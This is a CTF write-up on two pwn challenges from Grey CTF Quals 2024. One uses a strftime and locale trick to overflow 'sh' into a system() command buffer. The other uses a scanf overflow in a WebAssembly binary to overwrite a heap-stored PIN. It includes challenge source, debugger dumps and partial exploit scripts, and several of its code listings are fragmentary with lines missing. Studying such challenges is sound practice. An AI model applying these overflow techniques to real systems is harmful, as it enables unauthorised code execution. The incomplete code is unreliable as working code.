Grey Cat the Flag Quals 2024


Grey CTF Quals 2024 took place on 27 April. I played with slight_smile and got 3rd place locally, qualifying for the finals! I solved all the pwn except for heapheapheap, which is too painpainpain to do :((


Here are my writeups for some of the interesting pwn challenges.

Baby Fmtstr


Source code for the challenge:

#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <locale.h>

void setup(){
setvbuf(stdout, NULL, _IONBF, 0);
setbuf(stdin, NULL);
setbuf(stderr, NULL);

char output[0x20];
char command[0x20];

void goodbye(){

void print_time(){
time_t now;
struct tm *time_struct;
char input[0x20];
char buf[0x30];

time_struct = localtime(&now);

printf("The time now is %d.\nEnter format specifier: ", now);
fgets(input, 0x20, stdin);

for(int i = 0; i < strlen(input)-1; i++){
if(i % 2 == 0 && input[i] != '%'){
puts("Only format specifiers allowed!");

strftime(buf, 0x30, input, time_struct);
// remove newline at the end
buf[strlen(buf)-1] = '\0';

memcpy(output, buf, strlen(buf));
printf("Formatted: %s\n", output);

void set_locale(){
char input[0x20];
printf("Enter new locale: ");
fgets(input, 0x20, stdin);
char *result = setlocale(LC_TIME, input);
if(result == NULL){
puts("Failed to set locale :(");
puts("Run locale -a for a list of valid locales.");
puts("Locale changed successfully!");

int main(){
int choice = 0;


strcpy(command, "ls");

while (1){
puts("Welcome to international time converter!");
puts("1. Print time");
puts("2. Change language");
puts("3. Exit");
printf("> ");

scanf("%d", &choice);

if(choice == 1){
}else if(choice == 2){

In this challenge, we can provide arbitrary strftime format strings and also change the locale used to generate the string. The difference between printf and strftime is that strftime only has 1 “argument” - the time. This makes it much safer than printf vulnerability. However, in here, we have 2 buffers - the output and command buffer, where the output buffer is placed before the command buffer in memory. The command buffer is passed to system when we select option 3.

The limit passed to strftime is 0x30, which means that the output will be at most 0x30 bytes long. memcpy uses the strlen of the output to copy n bytes to output, which is only 0x20 bytes long. We just need to use specifiers that output more than 2 bytes (since each specifier is 2 bytes) in order to increase the length of the specifier and overflow into command.

The goal is to find a datetime string from a certain locale with sh in it, so we can overflow into the command variable with sh and get RCE. Obviously I’m not Duolingo and I don’t know every language, so I spun up the provided container to get all the available locales on remote.

/ # ls /srv/usr/lib/locale
C.utf8 ca_ES@valencia es_BO gl_ES@euro mnw_MM sq_AL.utf8
aa_DJ ca_FR es_BO.utf8 gu_IN mr_IN sq_MK

(there are over 500 so I’m not putting all here)

Then taking these locales, I looped through a few different format specifiers to see if sh appears in the output.

timestr = b"%a" # %b etc
for i in locales:
if b"Failed" not in p.clean():
p.recvuntil(b"Formatted: ")
out = p.recvline()"{i}: {out}")
if b"sh" in out:"FOUND!")

These few locales gave me sh:

# %A: [*] sq_AL.utf8: b'e shtun\xc3\xab\xbe\xd1\x82\xd0\xb0\x97\xe1\x83\x98\n'
# %c: [*] xh_ZA.utf8: b'Mgq 20 Tsh 2024 08:00:06 UTC\n'
# %b: [*] xh_ZA.utf8: b'Tsh\n'

However, because we want the command to just be sh, the only one we can use is %b, as the newline will be replaced by \x00. It’s not enough for the datetime to contain sh, it must end with sh. We need to overflow the buffer such that the T is not in command buffer.

Another way to solve this is to find separate datetime strings that end with h and s, and overflow them individually, such that the following occurs:

round 1 (output is xxxxxh): xxxxxh\x00
round 2 (output is xxxxs): xxxxsh\x00

The reason why this works is actually slightly more complicated. At first glance, the output from strftime is always truncated with a null byte, so it shouldn’t be possible to combine multiple strings to form our command. However, because of uninitialized stack, this exploit is actually feasible. According to the strftime docs:

If the total number of resulting bytes including the terminating null byte is not more than maxsize, strftime() shall return the number of bytes placed into the array pointed to by s, not including the terminating null byte. Otherwise, 0 shall be returned and the contents of the array are unspecified.

strftime doesn’t terminate the output string with a null byte! The stack must align nicely such that print_time is always allocated the same stack frame. Since buf isn’t initialized, the old output from strftime will still be there, and the strlen will be new output + remaining old output. This entire string will then be copied into output and subsequently overflow into command with the “sh” string we want.

During the CTF, I just used the below exploit which only needs 1 round of input, but it only works in April. I’m too lazy to find an exploit that works in May for multiple-round inputs :)

# the solution only works in april
locale = b"xh_ZA.utf8"
payload = b"".join([

if len(payload) > 32:"bad")



Unfortunately, at the point of making this writeup, it is no longer April and my exploit doesn’t work anymore :(

(also the entire reason for moving grey is so that this chall would be solvable)


The Motorola 2


This challenge was part 2 of The Motorola.

The main challenge for both parts is in this snippet:

void login() {
char attempt[0x30];
int count = 5;

for (int i = 0; i < 5; i++) {
memset(attempt, 0, 0x30);
printf("\e[1;91m%d TRIES LEFT.\n\e[0m", 5-i);
printf("PIN: ");
scanf("%s", attempt);
if (!strcmp(attempt, pin)) {
slow_type("\n\e[1;33mAfter five unsuccessful attempts, the phone begins to emit an alarming heat, escalating to a point of no return. In a sudden burst of intensity, it explodes, sealing your fate.\e[0m\n\n");

Some context for The Motorola Part 1:

We are supposed to guess the secret PIN which is stored in the heap (our buffer overflow is on the stack, so we can’t overwrite it). We have a scanf buffer overflow, and there’s a win function defined (view_message). We can just ret2win here, no need to leak or overwrite the pin.

The difference is that Motorola 1 was compiled to x86_64, while Motorola 2 is compiled to wasm. Surprisingly (or unsurprisingly), this changes a lot of things under the hood!

To run the binary in GDB, install wasmtime and run the following command:

gdb --args wasmtime --dir ./ -g --config ./cache.toml chall

Now, what’s different about this challenge?

Firstly, RCE is no longer possible. To understand why, we need to dive into how wasm control flow works.

Side tracking into wasm’s control flow

Functions are natively typed in wasm. If you run wasm2wat on the binary, you can see a lot of generic function types:

(type (;0;) (func (param i32) (result i32)))
(type (;1;) (func (param i32 i32 i32) (result i32)))
(type (;2;) (func (param i32 i64 i32) (result i64)))
(type (;3;) (func (param i32 i32) (result i32)))
(type (;4;) (func (param i32 i32 i32 i32) (result i32)))
(type (;5;) (func (param i32 i64 i32 i32) (result i32)))
(type (;6;) (func (param i32 i32 i32 i32 i32 i64 i64 i32 i32) (result i32)))
(type (;7;) (func (param i32)))
(type (;8;) (func))
(type (;9;) (func (param i32 i32 i32 i32 i32) (result i32)))
(type (;10;) (func (result i32)))
(type (;11;) (func (param i32 i32)))
(type (;12;) (func (param i32 i32 i32 i32 i64 i64 i32 i32) (result i32)))
(type (;13;) (func (param f64 i32) (result f64)))
(type (;14;) (func (param i32 i32 i32)))
(type (;15;) (func (param i32 i32 i32 i32 i32)))
(type (;16;) (func (param i32 i64)))
(type (;17;) (func (param i32 i32 i32 i64) (result i64)))
(type (;18;) (func (param f64 f64) (result f64)))
(type (;19;) (func (param i32 i32 i32) (result f64)))
(type (;20;) (func (param i32 i32 i32 i32 i32) (result f64)))
(type (;21;) (func (param i32 i32) (result i64)))
(type (;22;) (func (param i32 i64 i64 i64 i64 i32)))
(type (;23;) (func (param i32 i64 i64 i64 i64)))
(type (;24;) (func (param i32 i64 i64 i32)))

For example, slow_type is compiled as a type 7 function, which takes in 1 i32 parameter and returns nothing.

(func $slow_type (type 7) (param i32)
(local i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)
global.get $__stack_pointer
local.set 1

When a call is made from a parent function, the instruction is simply call $slow_type. This is a little similar to call in Intel/AT&T syntax. The current instruction address is pushed onto the call stack, which is a separate stack for instruction pointers to continue execution after call and call_indirect. This stack lives outside the runtime VM, so it’s generally not possible to hijack it. The arguments to the function are pushed onto the top of the stack, and these arguments become the locals array which can be accessed within the function (eg. local.get 14 will get the 15th value on the stack). When the function is finished, the return value(s) are pushed onto the stack and the parent function continues execution based on the call stack.

Here’s a demo, breaking on the slow_type function:

0 0x7ffff5bd70f0
1 0x7ffff5bd757b
2 0x7ffff5bd78c0
3 0x7ffff5bd70b1
4 0x7ffff5bed4ba

pwndbg> stack
+000 rsp 0x7fffffffbb28 —▸ 0x7ffff5bd757b ◂— mov dword ptr [r14 + 0x1d0], r15d
+048 0x7fffffffbb68 —▸ 0x7ffff5bd78c0 ◂— xor eax, eax
+068 0x7fffffffbb88 —▸ 0x7ffff5bd70b1 ◂— mov rbx, rax

The value pointed to by rsp (rsp of VM, not the sandboxed process!) belongs, if we check the disassembly, to the login function.

Dump of assembler code for function login:
0x00007ffff5bd7410 <+0>: push rbp
0x00007ffff5bd7411 <+1>: mov rbp,rsp
0x00007ffff5bd7414 <+4>: mov r10,QWORD PTR [rdi+0x8]
0x00007ffff5bd757b <+363>: mov DWORD PTR [r14+0x1d0],r15d
0x00007ffff5bd7582 <+370>: mov rbx,QWORD PTR [rsp]
0x00007ffff5bd7586 <+374>: mov r12,QWORD PTR [rsp+0x8]
0x00007ffff5bd758b <+379>: mov r13,QWORD PTR [rsp+0x10]
0x00007ffff5bd7590 <+384>: mov r14,QWORD PTR [rsp+0x18]
0x00007ffff5bd7595 <+389>: mov r15,QWORD PTR [rsp+0x20]
0x00007ffff5bd759a <+394>: add rsp,0x30
0x00007ffff5bd759e <+398>: mov rsp,rbp
0x00007ffff5bd75a1 <+401>: pop rbp
0x00007ffff5bd75a2 <+402>: ret
0x00007ffff5bd75a3 <+403>: ud2

(side note, all user-defined functions live in this address space):

0x7ffff5b96000     0x7ffff5bd6000 rw-p    40000      0 [anon_7ffff5b96]
0x7ffff5bd6000 0x7ffff5bd7000 r--p 1000 0 [anon_7ffff5bd6]
0x7ffff5bd7000 0x7ffff5bee000 r-xp 17000 0 [anon_7ffff5bd7] <-- function page
0x7ffff5bee000 0x7ffff5c54000 r--p 66000 0 [anon_7ffff5bee]
0x7ffff5c54000 0x7ffff5c55000 ---p 1000 0 [anon_7ffff5c54]

Probably, the space is writable at some point during VM initialization, and the wasm is compiled to x86_64 “JIT”, and written to this space.

Another thing - you might have noticed by now that wasm doesn’t really have a concept of registers. Rather (similar to python bytecode!), it stores most values on the stack (in fact, its entire memory is just a huge array, a continuous block of memory). And our “stack” (the entire linear memory region within the VM) is found in this memory region:

0x7ffdb0000000     0x7ffe30000000 ---p 80000000      0 [anon_7ffdb0000]
0x7ffe30000000 0x7ffe30002000 rw-p 2000 0 /memfd:wasm-memory-image (deleted)
0x7ffe30002000 0x7ffe30020000 rw-p 1e000 0 [anon_7ffe30002] <-- our linear memory region
0x7ffe30020000 0x7fffb0000000 ---p 17ffe0000 0 [anon_7ffe30020]
0x7fffb0000000 0x7fffb0089000 rw-p 89000 0 [anon_7fffb0000]

Anyway, the point of all this is to show that RIP control isn’t possible with regular call, because the call stack is isolated far far away from the VM’s accessible memory.

What about call_indirect? It takes a function index from the stack, accesses the function table, and calls the function with the corresponding index. The main purpose is to maintain compatibility with C native functions (eg. fclose which reads the close function for the target file from the FILE struct, which can only be known at runtime). Since the arguments must be passed in through the stack, and can be known at compile time, wasm is smart about this and requires the function signature in call_indirect. For example:

call_indirect (type 0)

will crash if the function index at the top of stack references a function that isn’t of type 0. This greatly restricts the functions we can jump to.

Unfortunately, we don’t have call_indirect in the login function. This is the disassembly for login:

(func $login (type 8)
(local i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i64 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)
global.get $__stack_pointer
local.set 0
i32.const 80
local.set 1
local.get 0
local.get 1
local.set 2
local.get 2
global.set $__stack_pointer
i32.const 5
local.set 3
local.get 2
local.get 3 offset=28
i32.const 0
local.set 4
local.get 2
local.get 4 offset=24
block ;; label = @1
loop ;; label = @2
local.get 2
i32.load offset=24
local.set 5
i32.const 5
local.set 6
local.get 5
local.set 7
local.get 6
local.set 8
local.get 7
local.get 8
local.set 9
i32.const 1
local.set 10
local.get 9
local.get 10
local.set 11
local.get 11
br_if 1 (;@1;)
i32.const 32
local.set 12
local.get 2
local.get 12
local.set 13
local.get 13
local.set 14
i64.const 0
local.set 15
local.get 14
local.get 15
i32.const 40
local.set 16
local.get 14
local.get 16
local.set 17
local.get 17
local.get 15
i32.const 32
local.set 18
local.get 14
local.get 18
local.set 19
local.get 19
local.get 15
i32.const 24
local.set 20
local.get 14
local.get 20
local.set 21
local.get 21
local.get 15
i32.const 16
local.set 22
local.get 14
local.get 22
local.set 23
local.get 23
local.get 15
i32.const 8
local.set 24
local.get 14
local.get 24
local.set 25
local.get 25
local.get 15
local.get 2
i32.load offset=24
local.set 26
i32.const 5
local.set 27
local.get 27
local.get 26
local.set 28
local.get 2
local.get 28
i32.const 1463
local.set 29
local.get 29
local.get 2
call $printf
i32.const 2752
local.set 30
i32.const 0
local.set 31
local.get 30
local.get 31
call $printf
i32.const 32
local.set 32
local.get 2
local.get 32
local.set 33
local.get 33
local.set 34
local.get 2
local.get 34 offset=16
i32.const 1064
local.set 35
i32.const 16
local.set 36
local.get 2
local.get 36
local.set 37
local.get 35
local.get 37
call $scanf
i32.const 32
local.set 38
local.get 2
local.get 38
local.set 39
local.get 39
local.set 40
i32.const 0
local.set 41
local.get 41
i32.load offset=6308
local.set 42
local.get 40
local.get 42
call $strcmp
local.set 43
block ;; label = @3
local.get 43
br_if 0 (;@3;)
call $view_message
local.get 2
i32.load offset=24
local.set 44
i32.const 1
local.set 45
local.get 44
local.get 45
local.set 46
local.get 2
local.get 46 offset=24
br 0 (;@2;)
i32.const 3012
local.set 47
local.get 47
call $slow_type
i32.const 80
local.set 48
local.get 2
local.get 48
local.set 49
local.get 49
global.set $__stack_pointer

So, RCE is out of the question. How else can we exploit the buffer overflow? We can’t overwrite the pin, because it’s stored in the heap, far away from the stack…right?

Exploiting quirks of wasm sandboxing

Actually, since wasm was designed to be sandboxed, the linear memory region/array is kept as small as possible, without the usual gaps between pages like the stack and heap that we see in regular x86_64 binaries. This means that the stack and heap might actually be contiguous! Let’s check how the stack and heap are set up, by setting a known PIN and known attempt, and searching for the 2 values in memory:


[anon_7ffe30002] 0x7ffe300127e0 'TESTPINTESTPINTESTPINTESTPINTESTPIN\n'
pwndbg> search -t bytes asdf
[anon_7ffe30002] 0x7ffe300122d0 0x66647361 /* 'asdf' */
pwndbg> p/x 0x7ffe300127e0 - 0x7ffe300122d0
$1 = 0x510

As we realize, the saved pin value is 0x510 after our input buffer! The reason why the heap is placed after the stack is because (I think) the stack is the first region to be defined, while the heap is only created after the first malloc call. So, wasm simply defines regions sequentially in the memory space, hence putting it after the stack.

This way, the challenge becomes similar to a strcmp challenge - just spam null bytes between input and saved pin, and we should be good to go, right?

● ctf/comp/2024-H0/greyctf/the-motorala-2
$ : python3
[+] Opening connection to on port 30212: Done
[*] Switching to interactive mode

After several intense attempts, you successfully breach the phone's defenses.
Unlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.
The once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the
clandestine hideout takes an unexpected turn, becoming even more complicated.

[*] Got EOF while reading in interactive

We are in fact not good to go - it crashed without printing the flag :(

Fixing the heap

Let’s take a closer look at the region between input and PIN:

pwndbg> tel 0x7ffe300122d0
00:0000│ 0x7ffe300122d0 ◂— 0x66647361 /* 'asdf' */
01:0008│ 0x7ffe300122d8 ◂— 0
... ↓ 5 skipped
07:0038│ 0x7ffe30012308 ◂— 0x1100000000
08:0040│ 0x7ffe30012310 ◂— 0x18e0000018e0
09:0048│ 0x7ffe30012318 ◂— 0x3200000010
0a:0050│ 0x7ffe30012320 ◂— 0x300012350
0b:0058│ 0x7ffe30012328 ◂— 0
... ↓ 3 skipped
0f:0078│ 0x7ffe30012348 ◂— 0x1300000000
10:0080│ 0x7ffe30012350 ◂— 0
11:0088│ 0x7ffe30012358 ◂— 0x48100000000
12:0090│ 0x7ffe30012360 ◂— 0x1235800012358
13:0098│ 0x7ffe30012368 ◂— 0
14:00a0│ 0x7ffe30012370 ◂— 0x4000019e8
15:00a8│ 0x7ffe30012378 ◂— 0x300000000
16:00b0│ 0x7ffe30012380 ◂— 0x100000002
17:00b8│ 0x7ffe30012388 ◂— 0x400000123d8
18:00c0│ 0x7ffe30012390 ◂— 0
19:00c8│ 0x7ffe30012398 ◂— 0xffffffff00000004
1a:00d0│ 0x7ffe300123a0 ◂— 0xffffffff
1b:00d8│ 0x7ffe300123a8 ◂— 0
... ↓ 133 skipped
a1:0508│ 0x7ffe300127d8 ◂— 0x5200000480
a3:0518│ 0x7ffe300127e8 ◂— 'ESTPINTESTPINTESTPINTESTPIN\n'
a4:0520│ 0x7ffe300127f0 ◂— 'STPINTESTPINTESTPIN\n'
a5:0528│ 0x7ffe300127f8 ◂— 'TPINTESTPIN\n'
a6:0530│ 0x7ffe30012800 ◂— 0xa4e4950 /* 'PIN\n' */

Most likely, we overwrote some important values here that should not be 0, hence crashing the program. These values are probably the heap metadata used to maintain the heap, which explains why the program crashed when we tried to read the flag file.

Luckily, wasm sandboxing once again works to our advantage. Since addresses are simply offsets from the start of the virtualized memory region, there’s no PIE or ASLR involved, so we can just hardcode all the values - whether addresses or chunk size values - without needing to leak anything! It took me a while to copy the values over into the exploit script, but this is the final exploit:

payload = flat(
p.sendlineafter(b"PIN:", payload)
$ : python3
[+] Opening connection to on port 30212: Done
[*] Switching to interactive mode

After several intense attempts, you successfully breach the phone's defenses.
Unlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.
The once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the
clandestine hie
$out takes an unexpected turn, becoming even more complicated.

Very cool challenge that inspired me to learn more about wasm! :)
